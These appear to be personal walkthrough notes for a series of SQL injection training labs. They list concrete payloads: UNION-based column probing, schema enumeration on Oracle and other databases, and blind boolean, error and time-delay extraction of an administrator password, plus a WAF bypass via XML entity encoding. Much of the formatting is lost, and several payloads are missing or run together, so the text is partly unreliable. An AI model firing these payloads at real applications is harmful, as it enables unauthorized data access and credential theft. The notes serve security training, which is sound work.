labs
Retrieving hidden data
Lab - 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Subverting application logic
Lab - 2 : SQL injection vulnerability allowing login bypass
UNION ATTACK
Lab - 3: SQL injection UNION attack, determining the number of columns returned by the query
GET /filter?category=Gifts'+ORDER+BY+4-- HTTP/1.1 will get an error and the numbers of returning columns must be 3.
Lab - 4: SQL injection UNION attack, finding a column containing text
GET /filter?category=Tech+gifts'+ORDER+BY+4-- HTTP/1.1 will get an error. GET /filter?category=Tech+gifts'+UNION+SELECT+'a',NULL,NULL-- will get an erorr.
Lab - 5: SQL injection UNION attack, retrieving data from other tables
The database contains a different table called
users, with columns calledusernameandpassword.Repeat the steps from above labs then find that there are 2 columns returning both with text columns
Lab - 6: SQL injection UNION attack, retrieving multiple values in a single column
The database contains a different table called users, with columns called username and password.
Repeat the steps from above labs and find that there are 2 columns in which second is the text column
we need to extract 2 text columns, so
Examining the databases
Lab - 7: SQL injection attack, querying the database type and version on Oracle
Repeat the above step and find that there are 2 columns
In Oracle database
UNION SELECT NULL,NULLdoesn't workInstead use
UNION SELECT NULL, NULL FROM dualBoth are text columns
Lab - 8: SQL injection attack, querying the database type and version on MySQL and Microsoft
' ORDER BY 2--doesn't workInstead use
' ORDER BY 2#for comment
Lab - 9: SQL injection attack, listing the database contents on non-Oracle databases
There are 2 string datatype columns
GET /filter?category=Gifts'+UNION+SELECT+TABLE_SCHEMA,TABLE_NAME+FROM+information_schema.tables-- HTTP/1.1will get the name of the user table
table_name = 'users_xvzwev'
GET /filter?category=Gifts'+UNION+SELECT+COLUMN_NAME,DATA_TYPE+FROM+information_schema.columns+WHERE+table_name='users_xvzwev'-- HTTP/1.1
columns = password_otojxu , username_gfdqod
GET /filter?category=Gifts'+UNION+SELECT+password_otojxu,username_gfdqod+FROM+users_xvzwev-- HTTP/1.1
will get the administrator password
Lab - 10: SQL injection attack, listing the database contents on Oracle
There are 2 string datatype columns returned
GET /filter?category=Pets'+UNION+SELECT+TABLE_NAME,'b'+FROM+all_tables-- HTTP/1.1
table_name = USERS_MZGWOV
GET /filter?category=Pets'+UNION+SELECT+COLUMN_NAME,'b'+FROM+all_tab_columns+WHERE+table_name='USERS_MZGWOV'-- HTTP/1.1
column_names = PASSWORD_HQOOJT, USERNAME_HIHHBB
GET /filter?category=Pets'+UNION+SELECT+USERNAME_HIHHBB,+PASSWORD_HQOOJT+FROM+USERS_MZGWOV-- HTTP/1.1In finding column names, single quote contains for table_name and no single quote for SELECT command
Blind SQL Injection
Lab - 11: Blind SQL injection with conditional responses
The database contains a different table called
users, with columns calledusernameandpasswordThis lab is vulnerable at
TrackingId
will not return the
Welcome back message.
return the
Welcome back messagecheck whether the table named
usersexistsAND (select 'x' from users LIMIT 1)='x'--check whether the username
administratorexistsAND (select username from users WHERE username='administrator')='administrator'--enumerate length of password of administrator
AND (select username from users WHERE username='administrator' AND LENGTH(password)>1)='administrator'--test with 2,3,4,5,... and find the length of the password
find the administrator's password
AND (select SUBSTRING(password,1,1) from users where username='administrator)='a'--use
cluster bombfrom intruder for two positionfirst number inside SUBSTRING function until the length of the password
character
='a'with a-z1-9... etc
Lab - 12: Blind SQL injection with conditional errors
check the endpoints and not vulnerable to SQL injection except TrackingId
test with
conditional responsesand no differencesconstruct a subquery
'||(SELECT '')||'--=> will get an error and try with'||(SELECT '' FROM dual)||'--=> return 200 and it is oracle database then check with other invalid table name'||(SELECT '' FROM invalid_name)||'--=> return 500 error
check whether table name
usersexists'||(SELECT '' FROM users WHERE ROWNUM = 1)||'=> will not return an error and users table exists
then check with conditional errors
will return no error but
will return error 500
check username
adminstratorexistsIf
username='administrator'exists in users table CASE WHEN will run and will results an error. If doesn't exists will not run and will not get an error.check the length of the password
substring the password
then use
cluster bombfrom burp intruder for 2 position
Lab - 13: Blind SQL injection with time delays
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
Lab - 14: Blind SQL injection with time delays and information retrieval
The database contains a different table called
users, with columns calledusernameandpassword.Repeat above steps and found that it is PostgreSQL database and vulnerable to time delay injection at TrackingId parameter
Find the length of the password
and found that it has 19 characters
use intruder and find the password of the administrator
in intruder window, don't forget to select
Response receivedcolumn from Columns
Lab - 15: Blind SQL injection with out-of-band interaction
Lab - 16: Blind SQL injection with out-of-band data exfiltration
The database contains a different table called
users, with columns calledusernameandpasswordcheck in the Burp Collaborator
find the password of the administrator
Lab 17: SQL injection with filter bypass via XML encoding
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users.
return
Then check the math operation
return 512 units
WAF is blocked an
Attack detectedInstall
Hackvertorfrom BApp storeSelect the SQL phrase that is injected and right clicked > extensions > hackvector > encode > dec_entities
Then send the request and error may not get
return
Last updated